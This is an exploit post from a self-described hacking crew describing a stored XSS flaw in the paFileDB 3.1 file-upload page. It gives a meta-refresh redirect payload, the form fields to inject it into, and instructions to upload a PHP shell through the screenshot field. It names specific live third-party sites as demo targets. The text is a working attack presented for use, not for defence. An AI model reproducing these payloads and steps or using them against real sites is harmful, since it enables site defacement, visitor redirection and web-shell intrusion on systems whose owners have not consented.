you can copy the exploit source from :
http://www.hell-z0ne.org/pafiledb.txt

[*]##############################################
[+] |____ViRuS_HiMa@YouR SyS__|__\              #
[+] |______________________|___||\*___          #
[+] |______________________|___||""|"*\___,     #
[+] |______________________|___||""|*"|___||    #
[+] "([ (@)''(@)""""""(|*(@)(@)********(@)*     #
[+]======================================================================||
[*] Title       : paFileDB 3.1 Xss Vuln as Redirecting Method .          ||
[!] Author      : ViRuS_HiMa                                             ||
[!] My Site     : wWw.HeLL-z0ne.org                                      ||
[!] E-Mail      : eGypT_GoVeRnMenT[at]HoTmaiL[dot]CoM                    ||
[!] Location    : Null,Null,Data+From+Egypt+Where+City_Name=Cairo--      ||
[!]======================================================================||
[!]                      [H]eL[L] [Z]on[E] [C]re[W]                      ||
[!]======================================================================||

   Description :

   paFileDB Is a web library witch allow you to upload & download files

   to your site , bla bla bla :p

   Bug :

   it was vulned be4 to upload your evil files , from :

   www.sitename.com/PfdPath/dload.php?action=user_upload

   some sites is asking you to register , , and others wasnt accept

   extensions except Images extensions , and more of problems .

   so we gonna use the same exploit but as xss method ,

   Live Demo :

   http://forum.cicero-project.net/dload.php?action=user_upload
   http://sylvanna.3e-online.org/phpBB2/dload.php?action=user_upload

   Enter the url , use this code :

  ">"">><meta http-equiv="Refresh" content="0;url=http://hell-z0ne.org">"">

   write the code in this fields : 

   "File Name","Short Description","Long Description"

  and write any thing in the other fields , 

  in "Category" field you have to choose an category whech have the Negative mark "-"

  in  Screenshot field you can upload your phpshell , 

  if dosnt accept you can upload any image ,  what ever ,

  now press on Add File , Then go to : 

  www.sitename.com/PfdPath/dload.php

  live demo :

  http://sylvanna.3e-online.org/phpBB2/dload.php
  http://forum.cicero-project.net/dload.php

  and enter the category where you post your xss code , ,

  cool its redirecting the site to your url that you put in the xss code

  http://hell-z0ne.org

  ">"">><meta http-equiv="Refresh" content="0;url=http://hell-z0ne.org">"">
[!]==============================================
[!] ya providor y2goog we m2goog 3amlen eh :p [!]
[!] Selamat Datang saudraku Black_Raptor :)   [!]
[!]=================================================================================
[!] Greatz : Providor,HcJ,ExH,Sina,Hakxer,oXide,Dr-Plus,Mo3tz,Prof.Selim,         [!]
[!]          X@Injector,Maestro-dz,Kasper-ksa,Qahtan-Sniper,Mr.G7eeM And ze Otherz[!]
[!]==================================================================================


 		 	   		  
_________________________________________________________________
Windows Live Hotmail: Your friends can get your Facebook updates, right from HotmailŪ.
http://www.microsoft.com/middleeast/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:en-xm:SI_SB_4:092009